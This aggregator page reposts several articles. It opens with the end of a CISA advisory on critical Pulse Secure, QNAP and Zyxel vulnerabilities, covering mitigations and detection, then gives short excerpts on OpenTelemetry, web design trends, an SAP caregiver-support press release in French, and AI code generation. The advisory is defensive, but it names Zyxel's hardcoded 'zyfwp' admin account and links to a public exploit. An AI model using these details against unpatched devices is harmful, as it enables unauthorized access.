  • CISA developed a tool to help determine if IOCs exist in the log files of a Pulse Secure VPN Appliance for CVE-2019-11510: cisa.gov/check-your-pulse.
  • Nmap developed a script that can be used with the port scanning engine: http-vuln-cve2019- 11510.nse #1708.

Vulnerable Technologies and Versions 

This vulnerability affects the following Pulse Connect Secure products:

  • 9.0R1 to 9.0R3.3
  • 8.3R1 to 8.3R7
  • 8.2R1 to 8.2R12

References 

https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/

 

Table 12: Information on Pulse CVE-2021-22893

                                               Pulse CVE-2021-22893              CVSS 3.0: 10 (Critical)

Vulnerability Description 

Pulse Connect Secure 9.0R3/9.1R1 and higher is vulnerable to an authentication bypass vulnerability exposed by the Windows File Share Browser and Pulse Secure Collaboration features of Pulse Connect Secure that can allow an unauthenticated user to perform remote arbitrary code execution on the Pulse Connect Secure gateway. This vulnerability has been exploited in the wild.
Recommended Mitigations

  • Updating such systems to PCS 9.1R11.4.
  • Run the PCS Integrity Assurance utility.
  • Enable Unauthenticated Request logging.
  • Enable remote logging.
  • Pulse Secure has published a Workaround-2104.xml file that contains mitigations to protect against this and other vulnerabilities.
  • Monitor capabilities in open source scanners. 
Detection Methods 

  • Log correlation between the authentication servers responsible for LDAP and RADIUS authentication and the VPN server. Authentication failures in either LDAP or RADIUS logs with the associated VPN logins showing success would be an anomalous event worthy of flagging.
  • The Pulse Security Check Tool.
  • A ‘recovery’ file not present in legitimate versions. https://ive-host/dana-na/auth/recover[.]cgi?token=<varies>.

Vulnerable Technologies and Versions 

This vulnerability affects Pulse Connect Secure 9.0R3/9.1R1 and higher.

References 

https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101/
https://blog.pulsesecure.net/pulse-connect-secure-security-update/
https://kb.cert.org/vuls/id/213092
https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44784/
https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html

 

Table 13: Information on QNAP CVE-2019-7192

                                                  QNAP CVE-2019-7192               CVSS 3.0: 9.8 (Critical)

Vulnerability Description 

This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions.

Recommended Mitigations 

Update Photo Station to versions: 

  • QTS 4.4.1 Photo Station 6.0.3 and later
  • QTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later
  • QTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later
  • QTS 4.2.6 Photo Station 5.2.11 and later 
Detection Methods 

  • N/A

Vulnerable Technologies and Versions 

This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.

References 

https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html

 

Table 14: Information on QNAP CVE- 2019-7193

                                                QNAP CVE-2019-7193                  CVSS 3.0: 9.8 (Critical)

Vulnerability Description 

This improper input validation vulnerability allows remote attackers to inject arbitrary code to the system. To fix the vulnerability, QNAP recommend updating QTS to their latest versions.

Recommended Mitigations 

Update QTS to versions: 

  • QTS 4.4.1 build 20190918 and later
  • QTS 4.3.6 build 20190919 and later
Detection Methods 

  • N/A

Vulnerable Technologies and Versions 

This vulnerability affects QNAP QTS 4.3.6 and 4.4.1 or earlier.

References 

https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html

 

Table 15: Information on QNAP CVE-2019-7194

                                               QNAP CVE-2019-7194             CVSS 3.0: 9.8 (Critical)

Vulnerability Description

This external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix the vulnerability, QNAP recommend updating Photo Station to their latest versions.

Recommended Mitigations 

Update Photo Station to versions: 

  • QTS 4.4.1 Photo Station 6.0.3 and later
  • QTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later
  • QTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later
  • QTS 4.2.6 Photo Station 5.2.11 and later
Detection Methods 

  • N/A

Vulnerable Technologies and Versions 

This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.

References 

https://www.qnap.com/zh-tw/security-advisory/nas-201911-25 
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html

 

Table 16: Information on QNAP CVE-2019-7195

                                             QNAP CVE-2019-7195                   CVSS 3.0: 9.8 (Critical)

Vulnerability Description 

This external control of file name or path vulnerability allows remote attackers to access or modify system files. To fix the vulnerability, QNAP recommend updating Photo Station to their latest versions.

Recommended Mitigations 

Update Photo Station to versions: 

  • QTS 4.4.1 Photo Station 6.0.3 and later
  • QTS 4.3.4-QTS 4.4.0 Photo Station 5.7.10 and later
  • QTS 4.3.0-QTS 4.3.3 Photo Station 5.4.9 and later
  • QTS 4.2.6 Photo Station 5.2.11 and later
Detection Methods 

  • N/A

Vulnerable Technologies and Versions 

This vulnerability affects QNAP Photo Station versions 5.2.11, 5.4.9, 5.7.10, and 6.0.3 or earlier.

References 

https://www.qnap.com/zh-tw/security-advisory/nas-201911-25
http://packetstormsecurity.com/files/157857/QNAP-QTS-And-Photo-Station-6.0.3-Remote-Command-Execution.html

 

Table 17: Information on Zyxel CVE-2020-29583

                                                Zyxel CVE-2020-29583            CVSS 3.0: 9.8 (Critical)

Vulnerability Description 

Firmware version 4.60 of Zyxel USG devices contains an undocumented account (zyfwp) with an unchangeable password. The password for this account can be found in cleartext in the firmware. This account can be used by someone to login to the SSH server or web interface with admin privileges.
Recommended Mitigations 

  • Download latest patch (4.60 Patch1 or newer)
Detection Methods 

  • Login attempts to the hardcoded undocumented account, seen in either audit logs or intrusion detection systems

Vulnerable Technologies and Versions 

This vulnerability affects the following technologies and versions:

  • ATP series running firmware ZLD V4.60
  • USG series running firmware ZLD V4.60
  • USG FLEX series running firmware ZLD V4.60
  • VPN series running firmware ZLD V4.60
  • NXC2500 running firmware V6.00 through V6.10
  • NXC5500 running firmware V6.00 through V6.10

References 

http://ftp.zyxel.com/USG40/firmware/USG40_4.60(AALA.1)C0_2.pdf
https://businessforum.zyxel.com/discussion/5252/zld-v4-60-revoke-and-wk48-firmware-release
https://businessforum.zyxel.com/discussion/5254/whats-new-for-zld4-60-patch-1-available-on-dec-15
https://www.eyecontrol.nl/blog/undocumented-user-account-in-zyxel-products.html
https://www.zyxel.com/support/CVE-2020-29583.shtml
https://www.zyxel.com/support/security_advisories.shtml

 

Revisions

  • Initial Version: June 7, 2022

This product is provided subject to this Notification and this Privacy & Use policy.

Source de l’article sur us-cert.gov

/par

OpenTelemetry in Action: Optimizing Database Operations

,

Many software developers can attest that some of the most significant issues in their applications arise from database performance. Though many developers prefer to use a relational database for enterprise applications, typical logging and monitoring solutions provide limited signals to detect database performance issues. Rooting out common bad practices such as chatty interactions between the application code and the database is non-trivial.

As developers, we need to understand how our database is performing from the context of user transactions. Ideally, we would have a common tool that can monitor the performance of both the application and the database concerning user transactions. OpenTelemetry has emerged as a popular tool for application monitoring, but it can also be extended for monitoring databases.

Source de l’article sur DZONE

/par

3 Essential Design Trends, June 2022

,

Are you bored with some of your current design projects? This month’s collection of website design trends can help break you out of that rut with some fun and funky alternatives.

And all of these options are anything but boring. From visual display to technique, these trends present a different set of challenges.

Here’s what’s trending in design this month.

1. Layers on Layers

These website designs have so many layers of information that you almost don’t know where to look or where the design elements start and stop.

This can be a complex technique to make work because of the number of elements competing for the same attention in the design.

What you are likely to see with this design tend includes an image or video background with some motion but not anything that truly demands attention. Then add on a few still images in smaller frames throughout the design. Layer on text as well for a three-deep effect.

If you interact with these designs, you’ll find that they are not flat either. They all include animated elements, hover states, and interactions that help direct you through the layers of what can be a somewhat complex design.

Western National Parks Association uses a background image, middle images with animations, and multiple text layers (some on the pictures and some on the background). There’s also scroll animation to help build the design. A lot is going on, but it does not feel too busy.

WIP Architects is another design with layers that interact with each other and include motion. With a lot of scroll animation and layers that go in front of and behind other elements, engagement helps this site work.

The Shipwreck Survey uses the same basic layer outline with a little more overlap between elements and less overall animation. The primary animated effect on the homepage is the scroll bar.

 

 

2. Directed Click Actions

This interesting website design trend can be incredibly useful or a wasted element – directed click actions. These are buttons, icons, and animations that tell you to click somewhere in the design to move to the next stage of interaction.

The direct approach ensures that users see and have the best possible chance of doing what the design is intended for. On the other hand, if you need this much instruction, is the design too complicated? Or is there a middle ground where this trend looks great and is usable?

In each of the examples below, these directed click actions are a bit different.

HUG Co has a big circle to click in the bottom third of the screen. It’s almost designed like a bullseye, and you can’t miss it. The thing that is interesting here is that most of the video falls below the scroll. The click action also has two emojis to denote action – a smiling face or pointer when you are ready to click. (The click extends the video to full screen.)

ThinkOvery also uses a similar circular click icon. It also takes you to the next screen in a single movement so that you can continue to explore the design.

Living with OCD has a different approach with scroll and back-to-top icons paired in the bottom right corner. The scroll option includes words to help create direction and instruction. It consists of a small animation and an interactive hover state when you get close to the interactive element. The interesting thing here is that it is not actually a button, and you use a traditional scroll to interact.

 

 

3. Word Breaks

If you are a stickler for readability, this design trend might make you cringe.

In each of these designs, words are broken across lines – some with and some without hyphens. For the most part, there’s not much confusion about what the words are, but it does make you pause and think during the page experience.

Why would this be a design trend?

It’s a combination of using large typography, long words, and figuring out a solution to create a common experience between large and small screens. Many of these words would not fit on mobile screens, for example, with the same weight, scale, and impact as the desktop counterparts.

Hence, the word break solution. It creates a consistent user experience across devices.

This technique should be used only if you think your audience is savvy enough to understand what you are trying to communicate with the word break. It can be a tricky proposition!

Plantarium breaks at “plant” with a word that’s made up. But with the imagery and supporting terms, you still know immediately what the design is about.

Michelle Beatty takes a common word and breaks it. Because “photog” and “rapher” are the only letters on the screen, it’s pretty easy to figure out. What’s interesting is that the word break is not on the syllable, but the letters do stack nicely with this break visually.

Wreel Collective breaks a word with a hyphen in giant letters – something we rarely see in website design. Hyphens are not often used in this medium. Because of this, it gets your attention and makes you think about the words and the design.

 

 

Conclusion

There are a lot of rule-breaking trends in this month’s collection. They are interesting, fun, and require a certain level of risk to execute.

Could you see yourself (or your clients) opting for a design that features one of these trends? Time will tell if these visual compositions grow in popularity or begin to fade fast.

Source

The post 3 Essential Design Trends, June 2022 first appeared on Webdesigner Depot.

Source de l’article sur Webdesignerdepot

/par

SAP choisit le tandem Responsage-Tilia pour accompagner ses salariés aidants

, , ,

Levallois-Perret, le 2 juin 2021 — Responsage, service spécialisé dans le conseil et l’orientation des salariés aidants et Tilia, start-up dédiée à l’accompagnement des aidants soutenue par BNP Paribas Personal Finance, annoncent que SAP, leader du marché des logiciels d’application d’entreprise, a choisi leurs solutions pour accompagner et soulager ses collaborateurs aidants dans leur quotidien.

L’aidance : un sujet majeur de l’accord inter-générationnel de SAP

C’est dans le cadre de l’accord intergénérationnel signé en fin d’année que SAP a choisi d’accompagner ses salariés aidants avec les services de Responsage et Tilia.

« De plus en plus de salariés doivent prendre soin d’un parent âgé, d’un enfant ou d’un conjoint malade ou en situation de handicap, affirme Sandra Lotode, Directrice des relations sociales. Cela a donc été une évidence de proposer aux aidants, au sein de nos dispositifs de qualité de vie au travail, une solution qui les soulage et préserve l’équilibre vie privée/vie professionnelle. »

Responsage-Tilia : la réponse idéale à la problématique de l’aidance

Expert reconnu de l’accompagnement des salariés aidants depuis 2013, Responsage accompagne les salariés tout au long de leur parcours d’aidant : entretien téléphonique/visio  pour hiérarchiser les problématiques, réponse écrite documentée en 3 jours ouvrés, calendrier de suivi personnalisé pour le montage des dossiers…. L’application Tilia offre un accès digital au service Responsage. De plus, Tilia assure la mise en œuvre et la coordination des différents prestataires nécessaires à la personne aidée.

« Le dispositif d’aide aux salariés aidants s’inscrit dans le volet social de la RSE, souligne Joël Riou, Président-Fondateur de Responsage. Soutenu par un accompagnement expert, le salarié préserve sa santé physique et mentale. Par ailleurs, grâce aux bilans anonymisés fournis par Responsage, SAP dispose d’une vision objectivée de la problématique dans l’entreprise. »

« Tilia se réjouit d’accompagner des entreprises qui inscrivent l’humain au cœur de leurs ambitions et qui font de l’aidance une priorité de leur stratégie de bien-être au travail, » indique Christine Lamidel, Fondatrice et Directrice Générale de Tilia. « Le dispositif Responsage-Tilia simplifie le quotidien des aidants et les rassure sur le bien-être de leur proche. Cela participe in fine au maintien de leur engagement professionnel, une nécessité pour rompre l’isolement auquel les aidants sont souvent confrontés. »

À propos de Responsage

Responsage accompagne les salariés aidants depuis 2013. L’entreprise compte plus de 100 clients (Danone, L’Oréal, Pernod-Ricard, Crédit Agricole, France Télévisions, Pôle emploi…) et couvre plus de 250 000 ayants droit. Responsage s’appuie sur une équipe d’assistants sociaux expérimentés, des bases de données de plus de 70 000 contacts et un outil d’aide à la rédaction expert. Les outils collectent et anonymisent dans des bilans les données sur les salariés accompagnés. L’entreprise peut ainsi orienter ses politiques sociales.

Le service est désormais élargi à l’accompagnement social global. Responsage compte parmi ses actionnaires, Bayard Presse, Danone, Babilou et le fonds d’investissement à impact social PhiTrust. Plus d’informations sur le site de Responsage.

À propos de Tilia

Tilia est un dispositif clé en main qui accompagne les entreprises et directions des ressources humaines désireuses d’épauler leurs collaborateurs confrontés à la situation d’un proche en état de dépendance. Cet accompagnement s’effectue par le biais d’une approche collective comprenant des cycles de conférences de sensibilisation à destination de tous les acteurs de l’entreprise, et d’une approche individuelle dédiée aux aidants. Le service proposé par Tilia a été élaboré dans le but d’apporter du répit aux collaborateurs contraints de conjuguer activité professionnelle et rôle d’aidant, et participer ainsi au maintien des équilibres de temps de vie au quotidien. Tilia assiste toutes les fragilités — maladie, handicap, grand-âge ou suite à un accident de la vie — en vue de faciliter le bien vivre à domicile, d’alléger le quotidien des aidants et de les rassurer quant au bien-être de leur proche fragilisé.

Tilia est une startup engagée (social business), issue d’un programme d’intrapreneuriat du Groupe BNP Paribas, développée par sa Directrice Générale et Fondatrice Christine Lamidel suite à son expérience familiale personnelle, et aujourd’hui accélérée par BNP Paribas Personal Finance. Plus d’informations sur le site Internet et le blog de Tilia. @TiliaOaidants | LinkedIn

À propos de SAP

La stratégie de SAP vise à aider chaque organisation à fonctionner en “entreprise intelligente”. En tant que leader du marché des logiciels d’application d’entreprise, nous aidons les entreprises de toutes tailles et de tous secteurs à opérer au mieux : 77 % des transactions commerciales mondiales entrent en contact avec un système SAP®. Nos technologies de Machine Learning, d’Internet des objets (IoT) et d’analytique avancées aident nos clients à transformer leurs activités en “entreprises intelligentes”. SAP permet aux personnes et aux organisations d’avoir une vision approfondie de leur business et favorise la collaboration afin qu’elles puissent garder une longueur d’avance sur leurs concurrents. Nous simplifions la technologie afin que les entreprises puissent utiliser nos logiciels comme elles le souhaitent – sans interruption. Notre suite d’applications et de services de bout en bout permet aux clients privés et publics de 25 secteurs d’activité dans le monde de fonctionner de manière rentable, de s’adapter en permanence et de faire la différence. Avec son réseau mondial de clients, partenaires, employés et leaders d’opinion, SAP aide le monde à mieux fonctionner et à améliorer la vie de chacun. Pour plus d’informations, visitez le site www.sap.com.

The post SAP choisit le tandem Responsage-Tilia pour accompagner ses salariés aidants appeared first on SAP France News.

Source de l’article sur sap.com

/par

NLP Models for Writing Code: Program Synthesis

,

Copilot, Codex, and AlphaCode: How Good are Computer Programs that Program Computers Now?

Enabled by the rise of transformers in Natural Language Processing (NLP), we’ve seen a flurry of astounding deep learning models for writing code in recent years. Computer programs that can write computer programs, generally known as the program synthesis problem, have been of research interest since at least the late 1960s (pdf) and early 1970s.

In the 2010s and 2020s, program synthesis research has been re-invigorated by the success of attention-based models in other sequence domains, namely the strategy of pre-training massive attention-based neural models (transformers) with millions or billions of parameters on hundreds of gigabytes of text.

Source de l’article sur DZONE

/par